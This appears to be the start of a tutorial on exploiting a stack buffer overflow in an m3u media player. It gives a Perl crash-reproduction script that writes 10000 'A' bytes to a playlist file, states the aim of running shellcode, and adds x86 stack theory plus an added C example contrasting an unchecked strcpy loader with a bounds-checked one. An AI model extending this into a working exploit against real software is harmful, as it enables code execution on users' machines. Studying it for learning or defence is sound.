Verify the bug

# Writes 10000 'A' (0x41) bytes into crash.m3u to reproduce the crash
use strict;
use warnings;

my $file = "crash.m3u";
my $junk = "\x41" x 10000;
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";

Main Goal

Control the application flow so that it executes unintended instructions, which is our “shellcode”.
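To show how an over-long m3u entry ends up controlling the flow, here is an added illustration (not the player's code or the original page's): a hypothetical loader that copies one entry into a fixed stack buffer without a check, beside a hardened version that rejects entries that do not fit. The buffer size of 260 and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the player's fixed stack buffer (hypothetical value) */
#define PATH_BUF_LEN 260

/* Vulnerable pattern (illustrative, not the real player's code): one m3u
 * line is copied into a fixed stack buffer with no length check. A line
 * longer than the buffer overwrites the data above it on the stack,
 * including the saved return address that becomes EIP on return. */
static void load_entry_unsafe(const char *line) {
    char path[PATH_BUF_LEN];
    strcpy(path, line);          /* overflow when strlen(line) >= PATH_BUF_LEN */
    printf("unsafe loader took: %s\n", path);
}

/* Hardened version: refuse an entry that does not fit, then copy with an
 * explicit bound and a guaranteed NUL terminator.
 * Returns 0 on success, -1 when the entry is rejected. */
static int load_entry_safe(const char *line, char *out, size_t out_len) {
    const char *end = memchr(line, '\0', out_len);
    if (end == NULL) {
        return -1;               /* no terminator within out_len: too long */
    }
    size_t n = (size_t)(end - line);
    memcpy(out, line, n);
    out[n] = '\0';
    return 0;
}

/* Constructed input: a run of 'A' (0x41) bytes, like the Perl script above. */
static char *make_junk(size_t count) {
    char *buf = malloc(count + 1);
    if (buf == NULL) return NULL;
    memset(buf, 'A', count);
    buf[count] = '\0';
    return buf;
}

int main(void) {
    char out[PATH_BUF_LEN];
    char *junk = make_junk(10000);
    load_entry_unsafe("song.mp3");                 /* short entry: fits */
    printf("safe loader, 10000 bytes: %d\n", load_entry_safe(junk, out, sizeof out));  /* -1 */
    printf("safe loader, short entry: %d\n", load_entry_safe("song.mp3", out, sizeof out)); /* 0 */
    free(junk);
    return 0;
}
```

The unsafe loader is only ever called with the short entry here; feeding it the 10000-byte input is exactly the crash the Perl script provokes.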

Before we proceed – some theory

  1. The EIP register holds the address of the next instruction to be executed
  2. The program's variables live in the data segment
  3. The stack is where we PUSH data to and POP data from

  1. ESP points to the top of the stack, which is the lowest address, since the stack grows downward
  2. When we POP something from the stack, ESP is incremented by 4 bytes

CPU Registers

Process Memory

  1. User-land: when a process is created, the address range 0x00000000 to 0x7FFFFFFF is reserved for user mode
  2. Kernel-land: when a process is created, the address range 0x80000000 to 0xFFFFFFFF is reserved for kernel mode